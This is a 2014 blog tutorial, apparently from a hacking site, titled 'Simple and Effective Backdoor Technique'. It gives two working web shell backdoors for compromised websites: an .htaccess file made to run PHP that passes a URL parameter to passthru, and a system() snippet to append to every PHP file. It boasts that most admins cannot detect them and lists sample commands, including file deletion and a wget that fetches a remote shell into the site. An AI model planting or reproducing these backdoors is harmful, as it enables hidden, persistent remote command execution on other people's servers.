Ofer For You (1)

Tuesday 12 August 2014

Simple and Effective Backdoor Technique..

By "Kunal Vohra", Director@H2K





In This Tutorial I Will Teach You Guys Two Methods of simple backdoorNote:-90%  ebadmins cant detect these backdoors, so enjoy..


Method 1:- Backdoor .htaccess file:

To backdoor .htaccess file of a website. Add the code below to the .htaccess file and change Permission to 777 (chmod 777).

Code:-
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-
php .htaccess
# <?php passthru($_GET
['cmd']); ?>

Now goto:

Code:- site.com/.htaccess?cmd=ls

after = you can run a command of your choice :).

Method 2:- Backdoor all php files:

To Backdoor all php files using a small code. 
Code:

<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
Append the above code into all PHP files of the website.
Now goto the:
backdooredsite.com/
phpfile.php?cmd=

After the equal sign add your command.

Sample Commands:-

Code:-

ls = Display the contents of the current directory ls -a  = Display also hidden files and hidden directories rm name = Remove a file or directory called name wget http://site.com/shell.txt;mv shell.txt 
shell.php = Upload php shell



Thats It Enjoy Simple and Effective Backdooring..



Still Having Problem..!!! Connect with Admin 

 Kunal Vohra
Download Our Official Android App & Get Free Internet
"The Hackers Street"

For Daily Updates 

No comments:

Post a Comment